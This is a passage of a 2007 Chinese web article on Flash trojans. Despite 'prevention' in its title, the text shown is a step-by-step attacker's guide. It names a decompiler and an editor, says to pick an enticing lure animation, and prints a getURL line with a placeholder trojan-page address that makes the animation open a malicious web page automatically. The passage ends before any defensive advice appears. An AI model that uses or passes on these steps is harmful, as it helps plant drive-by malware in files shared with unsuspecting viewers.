Flash木马分析与防范
2007-07-10 11:04:29 来源:WEB开发网在网站上观看Flash动画,接收到“好友”发来的一张Flash贺卡,甚至于一个QQ魔法表情,一不留神就中了一个木马!Flash动画木马可以说是无处不在,攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理,想知道攻击者是如何在SWF中插入木马的呢?我们应该怎么样来防范Flash木马呢?
一、制作Flash动画木马的准备
Flash动画木马的原理,是在网页中显示或本地直接播放Flash动画木马时,让Flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。
另外,我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”,以及Flash动画反编译工具“闪客精灵”,编辑工具Macromedia Flash MX。
二、最原始的Flash木马
现在虽然有了许多各种各样的Flash动画木马制作工具,但是为了了解Flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个Flash木马。
步骤一:反编译SWF动画
首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件”→“快速打开”命令,指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令,将动画导出为“MM热舞.fla”文件。
步骤二:插入网页木马代码
然后运行Flash动画编辑器Macromedia Flash MX,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的“getURL”命令,在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”,在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。
赞助商链接